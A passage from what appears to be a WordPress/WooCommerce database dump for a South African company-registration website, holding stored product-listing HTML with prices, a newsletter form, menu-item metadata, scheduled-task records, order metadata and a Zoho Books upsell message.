class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;999.00</span></ins></span>\n</a></li>\n<li class=\"product type-product post-79 status-publish instock product_cat-bee-requirements product_tag-affidavit product_tag-bee product_tag-eme product_tag-enterprise product_tag-exempted product_tag-micro has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/bee-requirements/bee-affidavit/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"BEE Affidavit\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">BEE Affidavit</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;199.00</span></span>\n</a></li>\n<li class=\"product type-product post-74 status-publish last instock product_cat-tax-registration product_tag-income-tax product_tag-income-tax-number product_tag-tax-number has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/tax-registration/income-tax-registration/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Income tax registration\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Business Income Tax Registration</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;150.00</span></span>\n</a></li>\n<li class=\"product type-product post-28092 status-publish first instock product_cat-combo-deals product_tag-bee-affidavit product_tag-company-registration product_tag-income-tax-registration product_tag-name-reservation product_tag-paye-registration product_tag-share-certificate product_tag-share-register product_tag-tax-clearance product_tag-vat-registration has-post-thumbnail sale sold-individually shipping-taxable purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/combo-deals/business-pro/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\">\n	<span class=\"onsale\">Sale!</span>\n<span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box-400x400.gif\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box-400x400.gif 400w, https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box-100x100.gif 100w, https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box-150x150.gif 150w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Business Pro</h2>\n	<span class=\"price\"><del><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;8,298.00</span></del> <ins><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;5,999.00</span></ins></span>\n</a></li>\n<li class=\"product type-product post-67 status-publish instock product_cat-maintaning-our-company product_tag-amend product_tag-cc product_tag-change product_tag-closed-coporation product_tag-member has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/maintaning-our-company/change-in-members/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Change in CC Member\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Member-cover.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Change in CC Member/s</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;450.00</span></span>\n</a></li>\n<li class=\"product type-product post-69 status-publish instock product_cat-maintaning-our-company product_tag-address product_tag-cc product_tag-change product_tag-closed has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/maintaning-our-company/change-in-close-corporation-address/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Change in Address\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Change in Close Corporation Address</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;450.00</span></span>\n</a></li>\n<li class=\"product type-product post-68 status-publish last instock product_cat-maintaning-our-company product_tag-address product_tag-change has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/maintaning-our-company/change-in-company-address/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Change in Address\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Change in Company Address</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;450.00</span></span>\n</a></li>\n</ul>\n</div>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_47    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_cta_13 et_hover_enabled et_pb_promo et_pb_bg_layout_dark  et_pb_text_align_center\">\n				\n				\n				<div class=\"et_pb_promo_description\">\n					<h2 class=\"et_pb_module_header\">New Business Owners</h2>\n					Having a clear road map is of paramount importance when starting a new business.<br />\nAt C.R.O you will find guidance and a step by step road map to success.\n				</div>\n				<div class=\"et_pb_button_wrapper\"><a class=\"et_pb_button et_pb_custom_button_icon et_pb_promo_button\" href=\"https://companyregistration.online/shop/business-tools/what-i-need-to-know-before-i-start-my-business\" data-icon=\"&#xe0ef;\">Start Here</a></div>\n			</div><div class=\"et_pb_module et_pb_divider_1 et_pb_space et_pb_divider_hidden\"><div class=\"et_pb_divider_internal\"></div></div><div class=\"et_pb_module et_pb_signup_1 et_hover_enabled et_pb_newsletter_layout_left_right et_pb_newsletter et_pb_subscribe clearfix et_pb_bg_layout_light  et_pb_text_align_center\">\n				\n				\n				<div class=\"et_pb_newsletter_description\">\n					<h2 class=\"et_pb_module_header\">Subscribe to our news letter </h2>\n					<p>Gain Tips & Tricks from our monthly newsletter to better run your business.</p>\n				</div>\n				\n				<div class=\"et_pb_newsletter_form\">\n					<form method=\"post\">\n						<div class=\"et_pb_newsletter_result et_pb_newsletter_error\"></div>\n						<div class=\"et_pb_newsletter_result et_pb_newsletter_success\">\n							<h2>Success!</h2>\n						</div>\n						<div class=\"et_pb_newsletter_fields\">\n							\n					<p class=\"et_pb_newsletter_field et_pb_contact_field_last et_pb_contact_field_last_tablet et_pb_contact_field_last_phone\">\n						<label class=\"et_pb_contact_form_label\" for=\"et_pb_signup_firstname\" style=\"display: none;\">First Name</label>\n						<input id=\"et_pb_signup_firstname\" class=\"input\" type=\"text\" placeholder=\"First Name\" name=\"et_pb_signup_firstname\">\n					</p>\n							\n					<p class=\"et_pb_newsletter_field et_pb_contact_field_last et_pb_contact_field_last_tablet et_pb_contact_field_last_phone\">\n						<label class=\"et_pb_contact_form_label\" for=\"et_pb_signup_lastname\" style=\"display: none;\">Last Name</label>\n						<input id=\"et_pb_signup_lastname\" class=\"input\" type=\"text\" placeholder=\"Last Name\" name=\"et_pb_signup_lastname\">\n					</p>\n							\n					<p class=\"et_pb_newsletter_field et_pb_contact_field_last et_pb_contact_field_last_tablet et_pb_contact_field_last_phone\">\n						<label class=\"et_pb_contact_form_label\" for=\"et_pb_signup_email\" style=\"display: none;\">Email</label>\n						<input id=\"et_pb_signup_email\" class=\"input\" type=\"text\" placeholder=\"Email\" name=\"et_pb_signup_email\">\n					</p>\n							\n							\n					<p class=\"et_pb_newsletter_button_wrap\">\n						<a class=\"et_pb_newsletter_button et_pb_button et_pb_custom_button_icon\" href=\"#\" data-icon=\"&#xe0ef;\">\n							<span class=\"et_subscribe_loader\"></span>\n							<span class=\"et_pb_newsletter_button_text\">Subscribe</span>\n						</a>\n					</p>\n							\n						</div>\n						\n						<input type=\"hidden\" value=\"mailchimp\" name=\"et_pb_signup_provider\" />\n						<input type=\"hidden\" value=\"542068cd37\" name=\"et_pb_signup_list_id\" />\n						<input type=\"hidden\" value=\"companyregistration.online division of MAW Inc\" name=\"et_pb_signup_account_name\" />\n						<input type=\"hidden\" value=\"true\" name=\"et_pb_signup_ip_address\" />\n					</form>\n				</div>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_14 et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_20 et_pb_row_fullwidth\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_48    et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_cta_14 et_hover_enabled et_pb_promo et_pb_bg_layout_dark  et_pb_text_align_center et_pb_no_bg\">\n				\n				\n				<div class=\"et_pb_promo_description\">\n					<h2 class=\"et_pb_module_header\">View Our Product Range</h2>\n					\n				</div>\n				<div class=\"et_pb_button_wrapper\"><a class=\"et_pb_button et_pb_custom_button_icon et_pb_promo_button\" href=\"#\" data-icon=\"&#xe0ef;\">View</a></div>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --></p>\n<span class=\"et_bloom_bottom_trigger\"></span>'),(16667,31271,'_menu_item_type','custom'),(16668,31271,'_menu_item_menu_item_parent','31269'),(16669,31271,'_menu_item_object_id','31271'),(16670,31271,'_menu_item_object','custom'),(16671,31271,'_menu_item_target',''),(16672,31271,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(16673,31271,'_menu_item_xfn',''),(16674,31271,'_menu_item_url','https://companyregistration.online/company-registration-faqs/'),(16676,31272,'_menu_item_type','custom'),(16677,31272,'_menu_item_menu_item_parent','31269'),(16678,31272,'_menu_item_object_id','31272'),(16679,31272,'_menu_item_object','custom'),(16680,31272,'_menu_item_target',''),(16681,31272,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(16682,31272,'_menu_item_xfn',''),(16683,31272,'_menu_item_url','https://companyregistration.online/annual-returns/'),(16685,31273,'_menu_item_type','custom'),(16686,31273,'_menu_item_menu_item_parent','31269'),(16687,31273,'_menu_item_object_id','31273'),(16688,31273,'_menu_item_object','custom'),(16689,31273,'_menu_item_target',''),(16690,31273,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(16691,31273,'_menu_item_xfn',''),(16692,31273,'_menu_item_url','https://companyregistration.online/restorations/'),(16694,31274,'_menu_item_type','custom'),(16695,31274,'_menu_item_menu_item_parent','31269'),(16696,31274,'_menu_item_object_id','31274'),(16697,31274,'_menu_item_object','custom'),(16698,31274,'_menu_item_target',''),(16699,31274,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(16700,31274,'_menu_item_xfn',''),(16701,31274,'_menu_item_url','https://companyregistration.online/deregistrations/'),(16703,31275,'_menu_item_type','custom'),(16704,31275,'_menu_item_menu_item_parent','31269'),(16705,31275,'_menu_item_object_id','31275'),(16706,31275,'_menu_item_object','custom'),(16707,31275,'_menu_item_target',''),(16708,31275,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(16709,31275,'_menu_item_xfn',''),(16710,31275,'_menu_item_url','https://companyregistration.online/close-corporations/'),(16712,31276,'_menu_item_type','custom'),(16713,31276,'_menu_item_menu_item_parent','31269'),(16714,31276,'_menu_item_object_id','31276'),(16715,31276,'_menu_item_object','custom'),(16716,31276,'_menu_item_target',''),(16717,31276,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(16718,31276,'_menu_item_xfn',''),(16719,31276,'_menu_item_url','#'),(16721,31277,'_menu_item_type','custom'),(16722,31277,'_menu_item_menu_item_parent','31276'),(16723,31277,'_menu_item_object_id','31277'),(16724,31277,'_menu_item_object','custom'),(16725,31277,'_menu_item_target',''),(16726,31277,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(16727,31277,'_menu_item_xfn',''),(16728,31277,'_menu_item_url','https://companyregistration.online/employees-tax-pay-as-you-earn-paye/'),(19564,32944,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566131893;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19563,32943,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566131893;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20225,33225,'_order_key','wc_order_03SzDjuEHW57G'),(20226,33225,'_customer_user','1'),(20224,33226,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566650319;}'),(20177,33188,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566585288;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20176,33187,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566585288;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20178,33189,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566588955;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17646,30483,'_wp_attachment_image_alt','Companyregistration logo'),(17649,30056,'_wp_attachment_image_alt','SSL'),(20181,33192,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566592684;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20180,33191,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566592684;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20185,33196,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566600466;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20184,33195,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566600466;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20187,33198,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566605460;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20186,33197,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566605460;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20256,33229,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566652263;}'),(20257,33231,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566652268;}'),(20193,33204,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566619135;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20192,33203,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566619135;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20197,33208,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566630925;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20196,33207,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566630924;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20195,33206,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566626866;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20194,33205,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566626866;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20199,33210,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566634642;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20198,33209,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566634642;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20201,33212,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566638287;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20200,33211,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566638287;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20203,33214,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566641973;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20202,33213,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566641973;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20205,33216,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566645927;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20204,33215,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566645927;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20207,33218,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566649757;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20206,33217,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566649757;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20258,33230,'_order_key','wc_order_v0fARkUU5JSM0'),(20211,33135,'wcf-pre-checkout-offer-popup-title','{first_name}, Wait! Your Order Is Almost Complete...'),(20255,33135,'_et_pb_ab_stats_refresh_interval','hourly'),(20209,33135,'wcf-pre-checkout-offer','yes'),(20210,33135,'wcf-pre-checkout-offer-desc','Right from negotiating deals, to raising sales orders, to invoicing, Zoho Books handles mundane accounting tasks so you can focus on your business.\r\n\r\nAll of our clients are on Zoho.\r\n\r\nNB: copy and paste in new window.\r\nwww.zoho.com/books/pricing/\r\n\r\nGet 2 months free + you show how to get another month free + we\'ll set it up for you.\r\n\r\nGet your accounting sorted from day 1, it\'s a nightmare to catchup.'),(20259,33230,'_customer_user','1'),(20260,33230,'_payment_method','payfast'),(20261,33230,'_payment_method_title','PayFast'),(20324,33243,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566660774;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20323,33242,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566660774;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20326,33245,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566664385;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20325,33244,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566664385;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20328,33247,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566667995;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20327,33246,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566667995;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20330,33249,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566673611;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20329,33248,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566673611;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20365,33284,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566754664;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20332,33251,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566683598;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20331,33250,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566683598;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20334,33253,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566687657;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20333,33252,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566687657;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20336,33255,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566691639;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20335,33254,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566691639;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20338,33257,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566696512;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20337,33256,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s: